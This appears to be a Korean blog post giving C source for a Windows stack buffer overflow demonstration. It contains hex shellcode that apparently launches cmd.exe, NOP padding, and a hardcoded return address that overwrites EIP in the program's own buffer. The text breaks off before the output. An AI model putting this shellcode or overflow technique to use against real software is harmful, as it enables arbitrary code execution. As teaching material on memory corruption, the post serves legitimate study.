적자생존

소스코드
-----------------------------------------------

#include <stdio.h>

#include <windows.h>

/*

buffer[256byte] + [ebp 4byte] + [eip 4type] = 264byte

B_SIZE(264byte) = shellcode( 43byte = shellcode(42byte) + '\0'(1byte) ) + nop*217 (nop+ebp) + ret(eip='\x1c\x29\x42\x00' 4byte)

*/

char shellcode[] = "\x55\x8B\xEC\x33\xDB\x53\x56\x57\xC6\x45"

   "\xFC\x63\xC6\x45\xFD\x6D\xC6\x45\xFE\x64"

   "\x6A\x05\x8D\x45\xFC\x50\xB8\x6D\x13\x86"

   "\x7C\xFF\xD0\x6A\x01\xB8\xDA\xCD\x81\x7C"

   "\xFF\xD0";

#define B_SIZE 264

char str[B_SIZE];

int main(int argc, char *argv[])

{

char buffer[256];

char ret[] = "\x1c\x29\x42\x00";

//  str   address :   42291c  ->  \x1c\x29\x42\x00

memset(str,'\x90',B_SIZE);  //  x90으로 채우고,

memcpy(str, shellcode, sizeof(shellcode)); // shellcode를 넣는다.

memcpy(str+sizeof(shellcode)+217, ret, sizeof(ret)); 

// shellcode뒤 217개 만큼 nop를 지나서(ebp까지 덮어짐) eip값에 ret[]의 값을 넣는다.

memcpy(buffer, str, sizeof(str)); // buffer에 str를 덮는다.

printf("------------------------------------------------------------------------\n");

for(int i=0;i<sizeof(str);i++)

printf("[Count %3d]  bufferAddr: %x <-> %10x : %10x <-> strAddr: %x \n", i, &buffer[i], buffer[i], str[i], &str[i]);

printf("------------------------------------------------------------------------\n");

printf("buffer address : %8x\n", buffer);

printf("str    address : %8x\n", str);

printf("buffer size    : %d\n", sizeof(buffer));

printf("str    size    : %d\n", sizeof(str));

printf("shellcode   size    : %d\n", sizeof(shellcode));

printf("------------------------------------------------------------------------\n");

return 0;

}

실행해보면...